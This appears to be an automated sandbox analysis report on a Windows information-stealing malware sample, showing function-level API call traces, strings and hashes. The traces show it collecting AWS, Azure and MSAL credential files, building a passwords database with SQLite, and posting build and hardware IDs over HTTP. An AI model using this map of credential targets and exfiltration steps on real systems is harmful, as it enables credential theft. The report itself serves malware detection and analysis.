lstrcatA.KERNEL32(00000000,?), ref: 00619921
lstrcatA.KERNEL32(00000000,0064833C), ref: 0061992D
lstrcatA.KERNEL32(00000000,?), ref: 00619937
lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00619943
GetProcessHeap.KERNEL32(00000000,0061AE7A), ref: 0061997A
RtlFreeHeap.NTDLL(00000000), ref: 00619981
GetProcessHeap.KERNEL32(00000000,?), ref: 0061998C
RtlFreeHeap.NTDLL(00000000), ref: 00619993
DeleteFileA.KERNEL32(?), ref: 0061999C

Strings

_passwords.db, xrefs: 0061993D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$Filelstrcat$Processlstrcpy$Free$AllocAllocateCloseCopyCreateDeleteExistsHandlePathReadSizeSleepSystemTimelstrlen
String ID: _passwords.db
API String ID: 2268221573-1485422284
Opcode ID: f437f687b0266158497a04146226410426ca2abafa6ed6adcfb4167c789977b9
Instruction ID: 4d95b2d70e4216ab1bf893cbac9cd2f4d84c481c1d3c0d74140ed497e2989777
Opcode Fuzzy Hash: f437f687b0266158497a04146226410426ca2abafa6ed6adcfb4167c789977b9
Instruction Fuzzy Hash: EC619F32900219AFCB40BFB5EC5AEDE7B7ABF05701F080518FA01A7161DB355E95CBA5

Function 00628705 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006221A5: lstrlenA.KERNEL32(?,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221AB
Part of subcall function 006221A5: lstrcpyA.KERNEL32(00000000,00000000,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221DD

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00628615: StrCmpCA.SHLWAPI(?,ERROR), ref: 00628669
Part of subcall function 00628615: lstrlenA.KERNEL32(?), ref: 00628674
Part of subcall function 00628615: StrStrA.SHLWAPI(00000000,?), ref: 00628689
Part of subcall function 00628615: lstrlenA.KERNEL32(?), ref: 00628698
Part of subcall function 00628615: lstrlenA.KERNEL32(00000000), ref: 006286B1

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

StrCmpCA.SHLWAPI(?,ERROR), ref: 006287EF
StrCmpCA.SHLWAPI(?,ERROR), ref: 00628848
StrCmpCA.SHLWAPI(?,ERROR), ref: 006288A8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00628901
StrCmpCA.SHLWAPI(?,ERROR), ref: 00628917
StrCmpCA.SHLWAPI(?,ERROR), ref: 0062892D
StrCmpCA.SHLWAPI(?,ERROR), ref: 0062893F
Sleep.KERNEL32(0000EA60), ref: 0062894E

Strings

ERROR, xrefs: 006288F9
sqlo.dll, xrefs: 00628A4D
ERROR, xrefs: 00628840
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 00628A2E
sqlite3.dll, xrefs: 006289EB
sqlo.dll, xrefs: 00628A1C
ERROR, xrefs: 006288A0
ERROR, xrefs: 006287E7
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 006289FD
sqlite3.dll, xrefs: 006289B7
ERROR, xrefs: 00628937
ERROR, xrefs: 0062890F
ERROR, xrefs: 00628925

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll
API String ID: 2840494320-2782864256
Opcode ID: 76111b164bf50ca632862f9a3cd54cca9939432e2691053ac6f92f2aefb0cc45
Instruction ID: 8f7713fbb2c6b6d9e3fdc7f13828d07bb0b9dfb13a785d06cada9725d09231d8
Opcode Fuzzy Hash: 76111b164bf50ca632862f9a3cd54cca9939432e2691053ac6f92f2aefb0cc45
Instruction Fuzzy Hash: 57910831E4052AABCB90FBA9FC579CC7776AF00700F554429BA04B7162DB306F698F88

Function 00611656 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00611686
wsprintfW.USER32 ref: 006116AC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 006116D6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 006116EE
RtlAllocateHeap.NTDLL(00000000), ref: 006116F5
_time64.MSVCRT ref: 006116FE
srand.MSVCRT ref: 00611705
rand.MSVCRT ref: 0061170E
_memset.LIBCMT ref: 0061171E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00611736
_memset.LIBCMT ref: 00611753
CloseHandle.KERNEL32(?), ref: 00611761
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0061177D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00611799
_memset.LIBCMT ref: 006117AE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 006117B8
RtlFreeHeap.NTDLL(00000000), ref: 006117BF
CloseHandle.KERNEL32(?), ref: 006117CB

Strings

delays.tmp, xrefs: 00611694
%s%s, xrefs: 006116A6

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 05a9c5a3321bea908cdb45105aa81955ed56483341d378fce1558ae243956cbe
Instruction ID: 79ff97833f73f46600a51906bbe20b01fec159b8efcb0a60993575d4df8b22e0
Opcode Fuzzy Hash: 05a9c5a3321bea908cdb45105aa81955ed56483341d378fce1558ae243956cbe
Instruction Fuzzy Hash: 0641B2B5900258ABDB209B71EC4DEEB7B7FEF8B710F041199F119D6191DA714AD0CE60

Function 00614A56 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00622175: lstrcpyA.KERNEL32(00000000,?,?,00611CF7,?,00629260), ref: 00622194

Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A10
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A16
Part of subcall function 006149DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00614A1C
Part of subcall function 006149DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00614A2E
Part of subcall function 006149DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00614A36

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00614AF5
StrCmpCA.SHLWAPI(?), ref: 00614B13
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00614CAB
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00614CEF
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00614D1D

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

lstrlenA.KERNEL32(?,00647A2B,",build_id,0064898C,------,00648980,",hwid,0064896C,------), ref: 00615016
lstrlenA.KERNEL32(?,?,00000000), ref: 00615029
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00615037
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00615094
InternetCloseHandle.WININET(00000000), ref: 0061509F
InternetCloseHandle.WININET(?), ref: 006150B6
InternetCloseHandle.WININET(?), ref: 006150C2

Strings

------, xrefs: 00614D23
build_id, xrefs: 00614F35
", xrefs: 00614F61
------, xrefs: 00614B9D
", xrefs: 00614E01
------, xrefs: 00614E83
hwid, xrefs: 00614DD5

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$build_id$hwid
API String ID: 3006978581-3960666492
Opcode ID: 51a98240250ab4243be3b2f186fbd0c15356e581620d5556f9243056cc666c07
Instruction ID: f82484262d73fbe391ddda4e9660481dc2bfb4174c5306d0f271d9eca5750630
Opcode Fuzzy Hash: 51a98240250ab4243be3b2f186fbd0c15356e581620d5556f9243056cc666c07
Instruction Fuzzy Hash: 2202DF32D1552A9ACFA0AB25EC52ADDB3BAFF04300F0544E5A64873126CA357FD68FC4

Function 00623463 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0062346A
CoInitializeEx.OLE32(00000000,00000000,0000004C,00625C36,Install Date: ,006478F0,00000000,Windows: ,006478E0,Work Dir: In memory,006478C8), ref: 0062347B
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0062348C
CoCreateInstance.OLE32(00643F70,00000000,00000001,00643EA0,?), ref: 006234A6
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 006234DC
VariantInit.OLEAUT32(?), ref: 00623537

Part of subcall function 006233B3: __EH_prolog3_catch.LIBCMT ref: 006233BA
Part of subcall function 006233B3: CoCreateInstance.OLE32(00644220,00000000,00000001,0064C180,?,00000018,0062355D,?), ref: 006233DD
Part of subcall function 006233B3: SysAllocString.OLEAUT32(?), ref: 006233EA
Part of subcall function 006233B3: _wtoi64.MSVCRT ref: 0062341D
Part of subcall function 006233B3: SysFreeString.OLEAUT32(?), ref: 00623436
Part of subcall function 006233B3: SysFreeString.OLEAUT32(00000000), ref: 0062343D

FileTimeToSystemTime.KERNEL32(?,?), ref: 00623566
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00623572
HeapAlloc.KERNEL32(00000000), ref: 00623579
VariantClear.OLEAUT32(?), ref: 006235B8
wsprintfA.USER32 ref: 006235A5

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Strings

%d/%d/%d %d:%d:%d, xrefs: 0062359F
Unknown, xrefs: 006235CD
InstallDate, xrefs: 00623549
ROOT\CIMV2, xrefs: 006234BE
Unknown, xrefs: 006235E1
Unknown, xrefs: 006235C6
Select * From Win32_OperatingSystem, xrefs: 006234F1
WQL, xrefs: 006234F6

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: d0e595e6c56c36d391222f1bf5d8d0a842c1381d85c0eecae4d1d4d966f5b88a
Instruction ID: d341fcfa9952031b9782f7dcb9ff9c61406cc048b230d7cf153d1a7dcbbcc44e
Opcode Fuzzy Hash: d0e595e6c56c36d391222f1bf5d8d0a842c1381d85c0eecae4d1d4d966f5b88a
Instruction Fuzzy Hash: 8B414B71900225BBDB109BD5DC49EEFBBBEEF8AB11F100509F611FA290C7789A41CB20

Function 0062820C Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00628231

Part of subcall function 00623A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00623A59

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00628250
lstrcatA.KERNEL32(?,\.azure\), ref: 0062826D

Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627D67
Part of subcall function 00627D20: FindFirstFileA.KERNEL32(?,?), ref: 00627D7E
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,00647AF4), ref: 00627D9F
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,00647AF8), ref: 00627DB9
Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627DE0
Part of subcall function 00627D20: StrCmpCA.SHLWAPI(?,006476B6), ref: 00627DF4
Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627E11
Part of subcall function 00627D20: PathMatchSpecA.SHLWAPI(?,?), ref: 00627E3E
Part of subcall function 00627D20: lstrcatA.KERNEL32(?), ref: 00627E74
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,00647B10), ref: 00627E86
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,?), ref: 00627E99
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,00647B14), ref: 00627EAB
Part of subcall function 00627D20: lstrcatA.KERNEL32(?,?), ref: 00627EBF

_memset.LIBCMT ref: 006282A5
lstrcatA.KERNEL32(?,00000000), ref: 006282C7
lstrcatA.KERNEL32(?,\.aws\), ref: 006282E4

Part of subcall function 00627D20: wsprintfA.USER32 ref: 00627E28
Part of subcall function 00627D20: CopyFileA.KERNEL32(?,?,00000001), ref: 00627F78
Part of subcall function 00627D20: DeleteFileA.KERNEL32(?), ref: 00627FEC
Part of subcall function 00627D20: FindNextFileA.KERNEL32(?,?), ref: 0062804E
Part of subcall function 00627D20: FindClose.KERNEL32(?), ref: 00628062

_memset.LIBCMT ref: 00628319
lstrcatA.KERNEL32(?,00000000), ref: 0062833B
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00628358
_memset.LIBCMT ref: 0062838D

Strings

\.azure\, xrefs: 00628261
*.*, xrefs: 00628285
*.*, xrefs: 006282F9
msal.cache, xrefs: 0062836D
Azure\.aws, xrefs: 006282F4
Azure\.azure, xrefs: 00628280
\.IdentityService\, xrefs: 0062834C
\.aws\, xrefs: 006282D8
Azure\.IdentityService, xrefs: 00628368

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 780282842-974132213
Opcode ID: e97a52aa20514a97bbaf0e95c093d54652448267c52335d3fbc84762057181bf
Instruction ID: 312e693d75368f16a3309717e58bb04a0097968e9a04c9a9c76904fcf6082b32
Opcode Fuzzy Hash: e97a52aa20514a97bbaf0e95c093d54652448267c52335d3fbc84762057181bf
Instruction Fuzzy Hash: 2D416071D8062C6BDB18FB60EC47FED777DEF05710F4408A8B604A7191EAB4AA848B94

Function 0061BB2E Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 006238A6: GetSystemTime.KERNEL32(?,00647807,?), ref: 006238D5

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

CopyFileA.KERNEL32(?,?,00000001), ref: 0061BBD3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0061BCDD
RtlAllocateHeap.NTDLL(00000000), ref: 0061BCE4
StrCmpCA.SHLWAPI(?,006485A4,00000000), ref: 0061BD95
StrCmpCA.SHLWAPI(?,006485A8), ref: 0061BDBD
lstrcatA.KERNEL32(00000000,?), ref: 0061BDE1
lstrcatA.KERNEL32(00000000,006485AC), ref: 0061BDED
lstrcatA.KERNEL32(00000000,?), ref: 0061BDF7
lstrcatA.KERNEL32(00000000,006485B0), ref: 0061BE03
lstrcatA.KERNEL32(00000000,?), ref: 0061BE0D
lstrcatA.KERNEL32(00000000,006485B4), ref: 0061BE19
lstrcatA.KERNEL32(00000000,?), ref: 0061BE23
lstrcatA.KERNEL32(00000000,006485B8), ref: 0061BE2F
lstrcatA.KERNEL32(00000000,?), ref: 0061BE39
lstrcatA.KERNEL32(00000000,006485BC), ref: 0061BE45
lstrcatA.KERNEL32(00000000,?), ref: 0061BE4F
lstrcatA.KERNEL32(00000000,006485C0), ref: 0061BE5B
lstrcatA.KERNEL32(00000000,?), ref: 0061BE65
lstrcatA.KERNEL32(00000000,006485C4), ref: 0061BE71
lstrlenA.KERNEL32(00000000), ref: 0061BEC3
lstrlenA.KERNEL32(?), ref: 0061BEDE
DeleteFileA.KERNEL32(?), ref: 0061BF21

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 9e8e860ee1234ea8e36059cc2ab6f839b672e273e2c2c8eccd4ad92b810a5afe
Instruction ID: 510088137cdf30ec5a2b5ffdaea8a1fdab3191bf11161c40ed77e1f42cdd1160
Opcode Fuzzy Hash: 9e8e860ee1234ea8e36059cc2ab6f839b672e273e2c2c8eccd4ad92b810a5afe
Instruction Fuzzy Hash: B1C1483290421AAFCF41BBA5ED5A9DE7B7ABF04311F100429FA00B7061DF366E969F44

Function 006252CC Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 278stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00625317
StrCmpCA.SHLWAPI(?,true), ref: 006253D9

Part of subcall function 006221A5: lstrlenA.KERNEL32(?,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221AB
Part of subcall function 006221A5: lstrcpyA.KERNEL32(00000000,00000000,?,00629098,006477FE,00647787,?,?,?,?,00629D6E), ref: 006221DD

lstrcpyA.KERNEL32(?,?), ref: 0062549B
lstrcpyA.KERNEL32(?,00000000), ref: 006254CB
lstrcpyA.KERNEL32(?,00000000), ref: 00625506
lstrcpyA.KERNEL32(?,00000000), ref: 00625541
